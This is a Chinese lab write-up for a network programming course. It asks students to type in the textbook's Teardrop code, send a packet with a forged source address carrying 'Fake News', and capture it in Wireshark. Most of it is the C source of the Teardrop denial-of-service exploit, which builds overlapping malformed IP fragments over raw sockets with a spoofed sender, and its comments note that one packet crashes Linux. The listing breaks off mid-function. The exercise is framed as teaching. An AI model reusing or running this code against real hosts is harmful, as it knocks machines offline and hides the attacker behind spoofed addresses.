文章目录
一、原始套接字编程
1.1、实验内容
完成“网络编程技术”参考书上 “2.11 原始套接字编程”中的Teardrop代码编程,伪造一个虚假地址的IP包,包的内容填入Fake News。发送此包。并用wireshark抓包进行验证。
1.2、实验过程
1、在Ubuntu下新建文件teardrop.c
gedit teardrop.c
2、写入代码
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <errno.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else
/* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x1c /* datagram frame padding for first packet */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.*/
void usage(u_char *);
u_long name_resolve(u_char *);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
// 定义源地址和目的地址
u_long src_ip = 0, dst_ip = 0;
// 定义源端口和目的端口
u_short src_prt = 0, dst_prt = 0;
// 定义一个32位的IPv4地址
struct in_addr addr;
printf("teardrop route|daemon9\n\n");
//创建原始套接字
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
fprintf(stderr, "raw socket");
exit(1);
}
//设置套接字选项IP_HDRINCL
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL,
(char *)&one, sizeof(one))< 0)
{
fprintf(stderr, "IP_HDRINCL");
exit(1);
}
if (argc < 3)
usage(argv[0]);
// 设置源IP 和 目的IP
if(!(src_ip=name_resolve(argv[1]))||!(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': // source port (should be emphemeral)
src_prt = (u_short)atoi(optarg);
break;
case 't': // dest port (DNS, anyone?)
dst_prt = (u_short)atoi(optarg);
break;
case 'n': // number to send
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; // NOTREACHED
}
}
srandom((unsigned)(utimes("0",(time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count)
count = COUNT;
printf("Death on flaxen wings:\n");
addr.s_addr = src_ip;
printf("From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
printf(" To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
printf(" Amt: %5d\n", count);
printf("[\n ");
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
// printf("b00m ");
usleep(500);
}
printf("]\n");
return (0);
}
// 设置 IP 包的内容
void send_frags(int sock, u_long src_ip, u_long dst_ip,u_short src_prt,u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL, *flag = NULL; // packet pointers
u_char byte; // a byte
// 套接字地址结构
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
flag = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
// IP version and header length
byte = 0x45;
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; // IP TOS (skipped)
// total length
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); // IP id
p_ptr += 2;
//IP frag flags and offset
*((u_short *)p_ptr) |= FIX(IP_MF);
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; // IP TTL
byte = IPPROTO_UDP;
memcpy